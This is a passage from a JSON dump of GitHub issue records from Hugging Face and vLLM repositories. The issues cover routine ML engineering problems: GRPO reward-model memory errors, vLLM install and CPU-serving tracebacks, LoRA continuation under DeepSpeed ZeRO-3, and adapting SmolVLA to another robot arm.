git+https://github.com/huggingface/lerobot-libero.git@b053a4b0de70a3f2d736abe0f9a9ee64477365df\nllvmlite==0.45.1\nMako==1.3.10\nMarkdown==3.9\nmarkdown-it-py==3.0.0\nMarkupSafe==3.0.2\nmatplotlib==3.10.1\nmatplotlib-inline==0.1.7\nmdit-py-plugins==0.5.0\nmdurl==0.1.2\nmergedeep==1.3.4\nmistune==3.1.3\nmore-itertools==10.7.0\nmpmath==1.3.0\nmujoco==3.3.2\nmultidict==6.7.0\nmultiprocess==0.70.16\nmypy_extensions==1.1.0\nnbclient==0.10.2\nnbconvert==7.16.6\nnbformat==5.10.4\nnest-asyncio==1.6.0\nnetworkx==3.4.2\nnh3==0.2.21\nninja==1.11.1.4\nnotebook==7.4.1\nnotebook_shim==0.2.4\nnum2words==0.5.14\nnumba==0.62.1\nnumpy==2.2.5\noauthlib==3.2.2\nomegaconf==2.3.0\nonnx==1.17.0\nopencv-contrib-python==4.11.0.86\nopencv-python==4.11.0\nopencv-python-headless==4.12.0.88\noptimum==1.24.0\norderly-set==5.5.0\noverrides==7.7.0\npackaging==25.0\npandas==2.3.3\npandocfilters==1.5.1\nparso==0.8.4\npexpect==4.9.0\npfzy==0.3.4\npillow==11.2.1\npkginfo==1.12.1.2\nplatformdirs==4.3.7\npluggy==1.6.0\nprometheus_client==0.21.1\nprompt_toolkit==3.0.51\npropcache==0.4.1\nprotobuf==6.30.2\npsutil==7.0.0\nptyprocess==0.7.0\npure_eval==0.2.3\npyarrow==21.0.0\npyav==14.2.1\npycparser==2.22\npycuda==2025.1\npydantic==2.12.1\npydantic_core==2.41.3\nPygments==2.19.1\nPyGObject==3.48.2\nPyJWT==2.7.0\npynput==1.8.1\nPyOpenGL==3.1.10\nPyOpenGL-accelerate==3.1.10\npyparsing==3.1.1\npyrsistent==0.20.0\npyserial==3.5\npytest==8.4.2\npython-apt==2.7.7+ubuntu4\npython-dateutil==2.9.0.post0\npython-json-logger==3.3.0\npython-xlib==0.33\npytools==2025.1.2\npytz==2025.2\nPyYAML==6.0.2\npyyaml-include==1.4.1\npyzmq==26.4.0\nreadme_renderer==44.0\nreferencing==0.36.2\nregex==2024.11.6\nrequests==2.32.3\nrequests-toolbelt=", "url": "https://github.com/huggingface/lerobot/issues/2354", "state": "open", "labels": [ "question", "policies", "simulation" ], "created_at": "2025-11-01T11:20:05Z", "updated_at": "2026-01-05T08:38:48Z", "user": "Hesh0629" }, { "repo": "huggingface/trl", "number": 4419, "title": "GRPO with reward model. CUDA out of memory. How to fix? 
Thank you very much.", "body": "train_grpo.py:\n```python\nimport argparse\nimport os\nfrom typing import Callable, Dict, List, Optional\n\nimport torch\nfrom datasets import Dataset, load_dataset\nfrom transformers import (\n AutoModelForCausalLM,\n AutoTokenizer,\n AutoModelForSequenceClassification,\n pipeline,\n set_seed,\n)\nfrom trl import GRPOConfig, GRPOTrainer\n\n\nclass CombinedReward:\n \"\"\"Combine multiple reward sources with weights.\n\n Each reward function follows signature:\n reward_fn(completions: List[str], prompts: List[str], **kwargs) -> List[float]\n \"\"\"\n\n def __init__(\n self,\n reward_fns: List[Callable[[List[str], List[str]], List[float]]],\n weights: Optional[List[float]] = None,\n ) -> None:\n if not reward_fns:\n raise ValueError(\"reward_fns must not be empty\")\n self.reward_fns = reward_fns\n self.weights = weights or [1.0] * len(reward_fns)\n if len(self.weights) != len(self.reward_fns):\n raise ValueError(\"weights length must match reward_fns length\")\n\n def __call__(self, completions: List[str], prompts: List[str], **kwargs) -> List[float]:\n if not completions:\n return []\n all_scores: List[List[float]] = []\n for reward_fn in self.reward_fns:\n scores = reward_fn(completions, prompts, **kwargs)\n if len(scores) != len(completions):\n raise ValueError(\"All reward functions must return scores for each completion\")\n all_scores.append(scores)\n # weighted sum\n totals: List[float] = [0.0] * len(completions)\n for w, scores in zip(self.weights, all_scores):\n for i, s in enumerate(scores):\n totals[i] += w * float(s)\n return totals\n\n\ndef build_reward_model_fn(\n reward_model_name: str,\n device: Optional[str] = None,\n normalize: bool = True,\n) -> Callable[[List[str], List[str]], List[float]]:\n \"\"\"Create a reward function using a sequence classification model.\n\n Returns a function that outputs a scalar reward per completion.\n \"\"\"\n rm_tokenizer = AutoTokenizer.from_pretrained(reward_model_name, use_fast=True)\n \n # ensure padding token exists for batched inference\n if rm_tokenizer.pad_token is None:\n candidate = rm_tokenizer.eos_token or rm_tokenizer.sep_token or rm_tokenizer.cls_token or rm_tokenizer.unk_token\n if candidate is not None:\n rm_tokenizer.pad_token = candidate\n else:\n rm_tokenizer.add_special_tokens({\"pad_token\": \"[PAD]\"})\n rm_model = AutoModelForSequenceClassification.from_pretrained(reward_model_name, torch_dtype=torch.float16, \n device_map=\"auto\")\n if getattr(rm_model.config, \"pad_token_id\", None) is None and rm_tokenizer.pad_token_id is not None:\n rm_model.config.pad_token_id = rm_tokenizer.pad_token_id\n\n\n # use a pipeline for batching and device placement\n pipe_device = 0 if (device == \"cuda\" or (device is None and torch.cuda.is_available())) else -1\n rm_pipe = pipeline(\n task=\"text-classification\",\n model=rm_model,\n tokenizer=rm_tokenizer,\n # device=pipe_device,\n truncation=True,\n top_k=None,\n function_to_apply=\"none\", # use raw logits so we can map scores directly\n return_all_scores=True,\n )\n\n def reward_fn(completions: List[str], prompts: List[str], **kwargs) -> List[float]:\n del prompts # unused here\n outputs = rm_pipe(completions, batch_size=kwargs.get(\"batch_size\", 2))\n scores: List[float] = []\n for out in outputs:\n # If binary classifier, use logit of positive class; otherwise sum weighted by label index\n if len(out) == 1:\n scores.append(float(out[0][\"score\"]))\n else:\n # prefer last class as \"more positive\"\n scores.append(float(out[-1][\"score\"]))\n 
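# NOTE: with function_to_apply=\"none\" the pipeline returns raw logits per label,\n # so out[-1][\"score\"] above uses the last label's logit as the reward; this\n # assumes the highest class index is the \"positive\" one, which may not hold\n # for every reward model.\n 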
if not normalize:\n return scores\n # z-norm for stability (per-batch)\n t = torch.tensor(scores, dtype=torch.float32)\n std = float(t.std().clamp(min=1e-6))\n mean = float(t.mean())\n normed = ((t - mean) / std).tolist()\n return [float(x) for x in normed]\n\n return reward_fn\n\n\ndef build_keyword_reward_fn(keywords: List[str], case_sensitive: bool = False, bonus: float = 1.0) -> Callable[[List[str], List[str]], List[float]]:\n ks = keywords if case_sensitive else [k.lower() for k in keywords]\n\n def reward_fn(completions: List[str], prompts: List[str], **kwargs) -> List[float]:\n del prompts\n scores: List[float] = []\n for text in completions:\n t = text if case_sensitive else text.lower()\n count = sum(1 for k in ks if k in t)\n scores.append(bonus * float(count))\n return scores\n\n return reward_fn\n\n\ndef build_length_reward_fn(target_min: int, target_max: int, scale: float = 1.0) -> Callable[[List[str], List[str]], Li", "url": "https://github.com/huggingface/trl/issues/4419", "state": "open", "labels": [ "\ud83c\udfcb Reward", "\ud83c\udfcb GRPO" ], "created_at": "2025-11-01T10:29:28Z", "updated_at": "2025-11-20T12:26:50Z", "user": "guotong1988" }, { "repo": "vllm-project/vllm", "number": 27912, "title": "[Usage]: How should I use the CPU to deploy QWEN3 VL 30B-A3B?", "body": "### Your current environment\n\n```text\nThe output of `python collect_env.py`\n```\n(APIServer pid=1033476) Traceback (most recent call last):\n(APIServer pid=1033476) File \"/home/maxgameone/anaconda3/bin/vllm\", line 33, in \n(APIServer pid=1033476) sys.exit(load_entry_point('vllm==0.11.1rc6.dev33+g3a5de7d2d.cpu', 'console_scripts', 'vllm')())\n(APIServer pid=1033476) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n(APIServer pid=1033476) File \"/home/maxgameone/anaconda3/lib/python3.12/site-packages/vllm-0.11.1rc6.dev33+g3a5de7d2d.cpu-py3.12-linux-x86_64.egg/vllm/entrypoints/cli/main.py\", line 73, in main\n(APIServer pid=1033476) args.dispatch_function(args)\n(APIServer pid=1033476) File \"/home/maxgameone/anaconda3/lib/python3.12/site-packages/vllm-0.11.1rc6.dev33+g3a5de7d2d.cpu-py3.12-linux-x86_64.egg/vllm/entrypoints/cli/serve.py\", line 59, in cmd\n(APIServer pid=1033476) uvloop.run(run_server(args))\n(APIServer pid=1033476) File \"/home/maxgameone/.local/lib/python3.12/site-packages/uvloop/__init__.py\", line 109, in run\n(APIServer pid=1033476) return __asyncio.run(\n(APIServer pid=1033476) ^^^^^^^^^^^^^^\n(APIServer pid=1033476) File \"/home/maxgameone/anaconda3/lib/python3.12/asyncio/runners.py\", line 194, in run\n(APIServer pid=1033476) return runner.run(main)\n(APIServer pid=1033476) ^^^^^^^^^^^^^^^^\n(APIServer pid=1033476) File \"/home/maxgameone/anaconda3/lib/python3.12/asyncio/runners.py\", line 118, in run\n(APIServer pid=1033476) return self._loop.run_until_complete(task)\n(APIServer pid=1033476) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n(APIServer pid=1033476) File \"uvloop/loop.pyx\", line 1518, in uvloop.loop.Loop.run_until_complete\n(APIServer pid=1033476) File \"/home/maxgameone/.local/lib/python3.12/site-packages/uvloop/__init__.py\", line 61, in wrapper\n(APIServer pid=1033476) return await main\n(APIServer pid=1033476) ^^^^^^^^^^\n(APIServer pid=1033476) File \"/home/maxgameone/anaconda3/lib/python3.12/site-packages/vllm-0.11.1rc6.dev33+g3a5de7d2d.cpu-py3.12-linux-x86_64.egg/vllm/entrypoints/openai/api_server.py\", line 1910, in run_server\n(APIServer pid=1033476) await run_server_worker(listen_address, sock, args, 
**uvicorn_kwargs)\n(APIServer pid=1033476) File \"/home/maxgameone/anaconda3/lib/python3.12/site-packages/vllm-0.11.1rc6.dev33+g3a5de7d2d.cpu-py3.12-linux-x86_64.egg/vllm/entrypoints/openai/api_server.py\", line 1926, in run_server_worker\n(APIServer pid=1033476) async with build_async_engine_client(\n(APIServer pid=1033476) ^^^^^^^^^^^^^^^^^^^^^^^^^^\n(APIServer pid=1033476) File \"/home/maxgameone/anaconda3/lib/python3.12/contextlib.py\", line 210, in __aenter__\n(APIServer pid=1033476) return await anext(self.gen)\n(APIServer pid=1033476) ^^^^^^^^^^^^^^^^^^^^^\n(APIServer pid=1033476) File \"/home/maxgameone/anaconda3/lib/python3.12/site-packages/vllm-0.11.1rc6.dev33+g3a5de7d2d.cpu-py3.12-linux-x86_64.egg/vllm/entrypoints/openai/api_server.py\", line 185, in build_async_engine_client\n(APIServer pid=1033476) async with build_async_engine_client_from_engine_args(\n(APIServer pid=1033476) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n(APIServer pid=1033476) File \"/home/maxgameone/anaconda3/lib/python3.12/contextlib.py\", line 210, in __aenter__\n(APIServer pid=1033476) return await anext(self.gen)\n(APIServer pid=1033476) ^^^^^^^^^^^^^^^^^^^^^\n(APIServer pid=1033476) File \"/home/maxgameone/anaconda3/lib/python3.12/site-packages/vllm-0.11.1rc6.dev33+g3a5de7d2d.cpu-py3.12-linux-x86_64.egg/vllm/entrypoints/openai/api_server.py\", line 232, in build_async_engine_client_from_engine_args\n(APIServer pid=1033476) async_llm = AsyncLLM.from_vllm_config(\n(APIServer pid=1033476) ^^^^^^^^^^^^^^^^^^^^^^^^^^\n(APIServer pid=1033476) File \"/home/maxgameone/anaconda3/lib/python3.12/site-packages/vllm-0.11.1rc6.dev33+g3a5de7d2d.cpu-py3.12-linux-x86_64.egg/vllm/utils/func_utils.py\", line 116, in inner\n(APIServer pid=1033476) return fn(*args, **kwargs)\n(APIServer pid=1033476) ^^^^^^^^^^^^^^^^^^^\n(APIServer pid=1033476) File \"/home/maxgameone/anaconda3/lib/python3.12/site-packages/vllm-0.11.1rc6.dev33+g3a5de7d2d.cpu-py3.12-linux-x86_64.egg/vllm/v1/engine/async_llm.py\", line 218, in from_vllm_config\n(APIServer pid=1033476) return cls(\n(APIServer pid=1033476) ^^^^\n(APIServer pid=1033476) File \"/home/maxgameone/anaconda3/lib/python3.12/site-packages/vllm-0.11.1rc6.dev33+g3a5de7d2d.cpu-py3.12-linux-x86_64.egg/vllm/v1/engine/async_llm.py\", line 140, in __init__\n(APIServer pid=1033476) self.engine_core = EngineCoreClient.make_async_mp_client(\n(APIServer pid=1033476) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n(APIServer pid=1033476) File \"/home/maxgameone/anaconda3/lib/python3.12/site-packages/vllm-0.11.1rc6.dev33+g3a5de7d2d.cpu-py3.12-linux-x86_64.egg/vllm", "url": "https://github.com/vllm-project/vllm/issues/27912", "state": "open", "labels": [ "usage" ], "created_at": "2025-11-01T07:40:04Z", "updated_at": "2025-11-01T07:40:04Z", "comments": 0, "user": "maxgameone" }, { "repo": "vllm-project/vllm", "number": 27899, "title": "[Bug]: Inductor specialize after 2.9 rebase", "body": "### Your current environment\n\nNA\n\n### \ud83d\udc1b Describe the bug\n\nCould you or someone have a look at compile ranges [PR](https://github.com/vllm-project/vllm/pull/24252) again? It seems to stop working with the update to pytorch 2.9. We started getting failed assertions in generated code like it was compiled for a single shape. Could you explain how to let the inductor know that we compile for a range not for a single shape?\nExample of the assertion. 
Compilation was done for a range (512, 8192)\nassert_size_stride(arg0_1, (8192, s4, s94), (s4*s94, s94, 1))\n\nCan you add quick repro instructions?\n\nSure, on the PR branch:\nvllm serve meta-llama/Meta-Llama-3.1-70B-Instruct --disable-log-requests --no-enable-prefix-caching -tp 4 -dp 1 --max-num-seqs 256 --load-format dummy --port 8001 --compilation-config '{\"pass_config\":{\"enable_fusion\":false,\"enable_attn_fusion\":false,\"enable_noop\":true,\"enable_sequence_parallelism\":false,\"enable_async_tp\":false,\"enable_fi_allreduce_fusion\":true}}'\n\ncc @ilmarkov ", "url": "https://github.com/vllm-project/vllm/issues/27899", "state": "closed", "labels": [ "bug" ], "created_at": "2025-10-31T22:16:27Z", "updated_at": "2025-11-07T00:03:25Z", "comments": 7, "user": "laithsakka" }, { "repo": "vllm-project/vllm", "number": 27898, "title": "[Doc]: Multi-node EP on EFA (i.e. no IBGDA/DeepEP)", "body": "### \ud83d\udcda The doc issue\n\nUsecase: On AWS we have EFA for high bandwidth interconnect, not Infiniband, so no IBGDA.\n\nThe [documentation](https://docs.vllm.ai/en/latest/serving/expert_parallel_deployment.html#backend-selection-guide) indicates that the DeepEP kernels should be used for multi/inter-node EP, and pplx for single node. However, [DeepEP indicates that they only support IBGDA for inter-node comms](https://github.com/deepseek-ai/DeepEP/issues/369).\n\npplx has good support for EFA. Is pplx for single node, DeepEP for multi-node a suggestion based on testing, or a hard requirement?\n\nIn addition, it appears that the EP size cannot be configured and is always TP x DP. Is there any way to set EP size to equal TP size (for example), so we can have each node be a DP group and limit EP alltoall's to intra-node (NVLink) only?\n\nThank you!\n\nEDIT: per https://github.com/vllm-project/vllm/issues/27633 it appears this may be problematic, although since pplx supports EFA as a transportation layer, this seems bizarre. Specific docs around usage on EFA would be helpful.", "url": "https://github.com/vllm-project/vllm/issues/27898", "state": "open", "labels": [ "documentation" ], "created_at": "2025-10-31T21:22:28Z", "updated_at": "2025-11-06T19:50:07Z", "comments": 1, "user": "nathan-az" }, { "repo": "huggingface/peft", "number": 2884, "title": "[Question/Bug] How to safely continue LoRA fine-tuning under DeepSpeed ZeRO-3 (multi-stage training with modules_to_save)", "body": "Hi,\nI\u2019m trying to perform multi-stage LoRA fine-tuning under DeepSpeed ZeRO-3 using PEFT.\nHowever, continuing training on an existing LoRA checkpoint without merging causes a series of errors and conflicts.\n\n\nProblem\n\nWhen I load the LoRA from Stage 1 and attempt to continue training:\n\t\u2022\tload_state_dict() throws shape mismatch (e.g. 
[0, hidden_size])\n\t•\tresize_token_embeddings() fails (empty tensor)\n\t•\tGPU memory usage explodes (batch size drops from 4 → 1)\n\nQuestion\n\nWhat’s the recommended practice for continuing LoRA fine-tuning under ZeRO-3?\n\t•\tShould we always merge the previous adapter (merge_and_unload()) before starting Stage 2?\n\t•\tOr is there a way to safely keep the existing adapter and continue training?\n\n\n\n\n### Who can help?\n\n_No response_\n\n### Reproduction\n\nSetup\n\t•\tStage 1: LoRA fine-tuning with modules_to_save=['wte','ff_out']\n\t•\tStage 2: Continue training on a new dataset (without merging)\n\t•\tUsing DeepSpeed ZeRO-3 (zero3_init_flag=False)\n\n\n### Expected behavior\n\nPEFT should provide a consistent way to:\n\t•\tContinue fine-tuning LoRA adapters across multiple stages with ZeRO-3 enabled.\n\t•\tAvoid re-initialization or memory explosion when modules_to_save is used.", "url": "https://github.com/huggingface/peft/issues/2884", "state": "closed", "labels": [], "created_at": "2025-10-31T20:13:12Z", "updated_at": "2025-12-09T15:05:26Z", "user": "XiangZhang-zx" }, { "repo": "huggingface/lerobot", "number": 2351, "title": "Details of adapting SmolVLA to other robotic arms with different configurations", "body": "I want to deploy the untuned `smolvla_base` model directly onto my AgileX PIPER robotic arm. I ran into the following two issues along the way:\n1. Missing normalization parameters in the metadata.\n```\n File \"/home/zwt/miniconda3/envs/lerobot/lib/python3.10/site-packages/torch/utils/_contextlib.py\", line 116, in decorate_context\n return func(*args, **kwargs)\n File \"/home/zwt/Projects/lerobot/lerobot/common/policies/smolvla/modeling_smolvla.py\", line 434, in select_action\n batch = self._prepare_batch(batch)\n File \"/home/zwt/Projects/lerobot/lerobot/common/policies/smolvla/modeling_smolvla.py\", line 412, in _prepare_batch\n batch = self.normalize_inputs(batch)\n File \"/home/zwt/miniconda3/envs/lerobot/lib/python3.10/site-packages/torch/nn/modules/module.py\", line 1751, in _wrapped_call_impl\n return self._call_impl(*args, **kwargs)\n File \"/home/zwt/miniconda3/envs/lerobot/lib/python3.10/site-packages/torch/nn/modules/module.py\", line 1762, in _call_impl\n return forward_call(*args, **kwargs)\n File \"/home/zwt/miniconda3/envs/lerobot/lib/python3.10/site-packages/torch/utils/_contextlib.py\", line 116, in decorate_context\n return func(*args, **kwargs)\n File \"/home/zwt/Projects/lerobot/lerobot/common/policies/normalize.py\", line 170, in forward\n assert not torch.isinf(mean).any(), _no_stats_error_str(\"mean\")\nAssertionError: `mean` is infinity. You should either initialize with `stats` as an argument, or use a pretrained model.\n```\nThe error was resolved when I copied the normalization parameters from other training results, but I'm not sure if this is the correct way to run `smolvla_base` directly.\n2. I've noticed that different robotic arms may have different degrees of freedom, or even if they have the same degrees of freedom, the range of rotation of the same joint can vary. 
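\n\nIf such a remap is needed, it is typically a per-joint affine transform between the two ranges; a minimal sketch (the ranges below are illustrative, not PIPER's real limits):\n\n```python\ndef remap_joint(value: float, src: tuple[float, float], dst: tuple[float, float]) -> float:\n    # Normalize within the source joint's range, then rescale to the target range.\n    t = (value - src[0]) / (src[1] - src[0])\n    return dst[0] + t * (dst[1] - dst[0])\n\n# e.g. map a joint in [-1.57, 1.57] rad onto a [0, 4095] servo tick range\nticks = remap_joint(0.0, (-1.57, 1.57), (0.0, 4095.0))\n```\n\n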
I'm unsure whether this range of rotation mapping is necessary when transferring the model to other robotic arms. It seems there is a similar operation for the aloha in the code.\n```\n def _pi_aloha_decode_state(self, state):\n # Flip the joints.\n for motor_idx in [1, 2, 8, 9]:\n state[:, motor_idx] *= -1\n # Reverse the gripper transformation that is being applied by the Aloha runtime.\n for motor_idx in [6, 13]:\n state[:, motor_idx] = aloha_gripper_to_angular(state[:, motor_idx])\n return state\n\n def _pi_aloha_encode_actions(self, actions):\n # Flip the joints.\n for motor_idx in [1, 2, 8, 9]:\n actions[:, :, motor_idx] *= -1\n # Reverse the gripper transformation that is being applied by the Aloha runtime.\n for motor_idx in [6, 13]:\n actions[:, :, motor_idx] = aloha_gripper_from_angular(actions[:, :, motor_idx])\n return actions\n\n def _pi_aloha_encode_actions_inv(self, actions):\n # Flip the joints again.\n for motor_idx in [1, 2, 8, 9]:\n actions[:, :, motor_idx] *= -1\n # Reverse the gripper transformation that is being applied by the Aloha runtime.\n for motor_idx in [6, 13]:\n actions[:, :, motor_idx] = aloha_gripper_from_angular_inv(actions[:, :, motor_idx])\n return actions\n```\nBtw, is it a meaningful operation to directly run smolvla_base? This is just one of my sudden thoughts. ", "url": "https://github.com/huggingface/lerobot/issues/2351", "state": "closed", "labels": [ "question", "policies" ], "created_at": "2025-10-31T14:55:35Z", "updated_at": "2025-12-14T14:47:04Z", "user": "yquanli" }, { "repo": "vllm-project/vllm", "number": 27880, "title": "[Installation]: [HELP] How to install the latest main version of vllm", "body": "### Your current environment\n\nI cloned the vllm code and ran the install commands, but it fails. Help!!\n\n### How you are installing vllm\n\n```sh\nVLLM_USE_PRECOMPILED=1 uv pip install --editable .\nUsing Python 3.10.12 environment at: /home/alice/.venv\n \u00d7 No solution found when resolving dependencies:\n \u2570\u2500\u25b6 Because there is no version of xformers{platform_machine == 'x86_64' and sys_platform == 'linux'}==0.0.33+5d4b92a5.d20251029 and vllm==0.11.1rc6.dev16+g933cdea44.precompiled depends\n on xformers{platform_machine == 'x86_64' and sys_platform == 'linux'}==0.0.33+5d4b92a5.d20251029, we can conclude that vllm==0.11.1rc6.dev16+g933cdea44.precompiled cannot be used.\n And because only vllm==0.11.1rc6.dev16+g933cdea44.precompiled is available and you require vllm, we can conclude that your requirements are unsatisfiable.\n(alice) alice@dc53-p31-t0-n067:~/vllm_bak$ uv pip install -e .\nUsing Python 3.10.12 environment at: /home/alice/.venv\n \u00d7 No solution found when resolving dependencies:\n \u2570\u2500\u25b6 Because there is no version of xformers{platform_machine == 'x86_64' and sys_platform == 'linux'}==0.0.33+5d4b92a5.d20251029 and vllm==0.11.1rc6.dev16+g933cdea44.cu126 depends on\n xformers{platform_machine == 'x86_64' and sys_platform == 'linux'}==0.0.33+5d4b92a5.d20251029, we can conclude that vllm==0.11.1rc6.dev16+g933cdea44.cu126 cannot be used.\n And because only vllm==0.11.1rc6.dev16+g933cdea44.cu126 is available and you require vllm, we can conclude that your requirements are unsatisfiable.```\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url":
"https://github.com/vllm-project/vllm/issues/27880", "state": "closed", "labels": [ "installation" ], "created_at": "2025-10-31T13:57:20Z", "updated_at": "2025-11-13T07:25:13Z", "comments": 7, "user": "sleepwalker2017" }, { "repo": "vllm-project/vllm", "number": 27877, "title": "[Usage]: How to install nightly version??? Why this command doesn't work?", "body": "### Your current environment\n\nI run this to install vllm with the latest code. But, the installed vllm doesn't include the code I need. \n\nI check the `siglip.py` file, it's modified 4 days ago. \n\nBut in the vllm installed, it doesn't contain this commit! https://github.com/vllm-project/vllm/pull/27566/files#diff-ca771e5a262cbf32fb481c518bea41d0e341414e021d6542e421abb98cceec61\n\n\nwhy is this?\n\nI use this command.\n```text\npip install -U vllm \\\n --pre \\\n --extra-index-url https://wheels.vllm.ai/nightly```\n\n`pip install -U vllm \\\n --pre \\\n --extra-index-url https://wheels.vllm.ai/nightly\nDefaulting to user installation because normal site-packages is not writeable\nLooking in indexes: https://bytedpypi.byted.org/simple, https://bytedpypi.byted.org/simple, https://wheels.vllm.ai/nightly\nRequirement already satisfied: vllm in /home/alice/.local/lib/python3.10/site-packages (0.11.0)\nCollecting vllm\n Downloading https://wheels.vllm.ai/nightly/vllm-0.11.1rc6.dev16%2Bg933cdea44.cu129-cp38-abi3-manylinux1_x86_64.whl (479.0 MB)\n \u2501\u257a\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501 17.8/479.0 MB 575.3 kB/s eta 0:13:22`\n### How would you like to use vllm\n\nI want to run inference of a [specific model](put link here). I don't know how to integrate it with vllm.\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27877", "state": "open", "labels": [ "usage" ], "created_at": "2025-10-31T12:29:51Z", "updated_at": "2025-10-31T12:38:19Z", "comments": 0, "user": "sleepwalker2017" }, { "repo": "vllm-project/vllm", "number": 27875, "title": "[Usage]: how to get profiler on OpenAI server", "body": "### Your current environment\n\n```text\nINFO 10-31 10:27:06 [importing.py:17] Triton not installed or not compatible; certain GPU-related functions will not be available.\nWARNING 10-31 10:27:06 [importing.py:29] Triton is not installed. Using dummy decorators. Install it via `pip install triton` to enable kernel compilation.\nINFO 10-31 10:27:08 [__init__.py:39] Available plugins for group vllm.platform_plugins:\nINFO 10-31 10:27:08 [__init__.py:41] - ascend -> vllm_ascend:register\nINFO 10-31 10:27:08 [__init__.py:44] All plugins in this group will be loaded. 
Set `VLLM_PLUGINS` to control which plugins to load.\nINFO 10-31 10:27:08 [__init__.py:235] Platform plugin ascend is activated\nWARNING 10-31 10:27:12 [_custom_ops.py:22] Failed to import from vllm._C with ModuleNotFoundError(\"No module named 'vllm._C'\")\nCollecting environment information...\nPyTorch version: 2.5.1\nIs debug build: False\n\nOS: Ubuntu 22.04.5 LTS (aarch64)\nGCC version: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0\nClang version: Could not collect\nCMake version: version 4.1.0\nLibc version: glibc-2.35\n\nPython version: 3.11.13 (main, Jul 26 2025, 07:27:32) [GCC 11.4.0] (64-bit runtime)\nPython platform: Linux-5.10.0-60.18.0.50.r865_35.hce2.aarch64-aarch64-with-glibc2.35\n\nCPU:\nArchitecture: aarch64\nCPU op-mode(s): 64-bit\nByte Order: Little Endian\nCPU(s): 192\nOn-line CPU(s) list: 0-191\nVendor ID: HiSilicon\nBIOS Vendor ID: HiSilicon\nModel name: Kunpeng-920\nBIOS Model name: HUAWEI Kunpeng 920 5250\nModel: 0\nThread(s) per core: 1\nCore(s) per socket: 48\nSocket(s): 4\nStepping: 0x1\nBogoMIPS: 200.00\nFlags: fp asimd evtstrm aes pmull sha1 sha2 crc32 atomics fphp asimdhp cpuid asimdrdm jscvt fcma dcpop asimddp asimdfhm ssbs\nL1d cache: 12 MiB (192 instances)\nL1i cache: 12 MiB (192 instances)\nL2 cache: 96 MiB (192 instances)\nL3 cache: 192 MiB (8 instances)\nNUMA node(s): 8\nNUMA node0 CPU(s): 0-23\nNUMA node1 CPU(s): 24-47\nNUMA node2 CPU(s): 48-71\nNUMA node3 CPU(s): 72-95\nNUMA node4 CPU(s): 96-119\nNUMA node5 CPU(s): 120-143\nNUMA node6 CPU(s): 144-167\nNUMA node7 CPU(s): 168-191\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Not affected\nVulnerability Retbleed: Not affected\nVulnerability Spec store bypass: Mitigation; Speculative Store Bypass disabled via prctl\nVulnerability Spectre v1: Mitigation; __user pointer sanitization\nVulnerability Spectre v2: Not affected\nVulnerability Srbds: Not affected\nVulnerability Tsx async abort: Not affected\n\nVersions of relevant libraries:\n[pip3] numpy==1.26.4\n[pip3] pyzmq==27.0.2\n[pip3] torch==2.5.1\n[pip3] torch-npu==2.5.1.post1\n[pip3] torchvision==0.20.1\n[pip3] transformers==4.52.4\n[conda] Could not collect\nvLLM Version: 0.9.1\nvLLM Ascend Version: 0.9.2.dev0+g0740d1021.d20251029 (git sha: 0740d1021, date: 20251029)\n\nENV 
Variables:\nATB_OPSRUNNER_KERNEL_CACHE_LOCAL_COUNT=1\nATB_STREAM_SYNC_EVERY_RUNNER_ENABLE=0\nATB_OPSRUNNER_SETUP_CACHE_ENABLE=1\nATB_WORKSPACE_MEM_ALLOC_GLOBAL=0\nATB_DEVICE_TILING_BUFFER_BLOCK_NUM=32\nATB_STREAM_SYNC_EVERY_KERNEL_ENABLE=0\nVLLM_TORCH_PROFILER_DIR=/workspace/prof\nATB_OPSRUNNER_KERNEL_CACHE_GLOABL_COUNT=5\nATB_HOME_PATH=/usr/local/Ascend/nnal/atb/latest/atb/cxx_abi_0\nASCEND_TOOLKIT_HOME=/usr/local/Ascend/ascend-toolkit/latest\nATB_COMPARE_TILING_EVERY_KERNEL=0\nASCEND_OPP_PATH=/usr/local/Ascend/ascend-toolkit/latest/opp\nLD_LIBRARY_PATH=/usr/local/Ascend/nnal/atb/latest/atb/cxx_abi_0/lib:/usr/local/Ascend/nnal/atb/latest/atb/cxx_abi_0/examples:/usr/local/Ascend/nnal/atb/latest/atb/cxx_abi_0/tests/atbopstest:/usr/local/Ascend/ascend-toolkit/latest/tools/aml/lib64:/usr/local/Ascend/ascend-toolkit/latest/tools/aml/lib64/plugin:/usr/local/Ascend/ascend-toolkit/latest/lib64:/usr/local/Ascend/ascend-toolkit/latest/lib64/plugin/opskernel:/usr/local/Ascend/ascend-toolkit/latest/lib64/plugin/nnengine:/usr/local/Ascend/ascend-toolkit/latest/opp/built-in/op_impl/ai_core/tbe/op_tiling/lib/linux/aarch64:/usr/local/Ascend/nnal/atb/latest/atb/cxx_abi_0/lib:/usr/local/Ascend/nnal/atb/latest/atb/cxx_abi_0/examples:/usr/local/Ascend/nnal/atb/latest/atb/cxx_abi_0/tests/atbopstest:/usr/local/Ascend/ascend-toolkit/latest/tools/aml/lib64:/usr/local/Ascend/ascend-toolkit/latest/tools/aml/lib64/plugin:/usr/local/Ascend/ascend-toolkit/latest/lib64:/usr/local/Ascend/ascend-toolkit/latest/lib64/plugin/opskernel:/usr", "url": "https://github.com/vllm-project/vllm/issues/27875", "state": "closed", "labels": [ "usage" ], "created_at": "2025-10-31T10:33:49Z", "updated_at": "2025-10-31T14:38:04Z", "comments": 1, "user": "zhaohaixu" 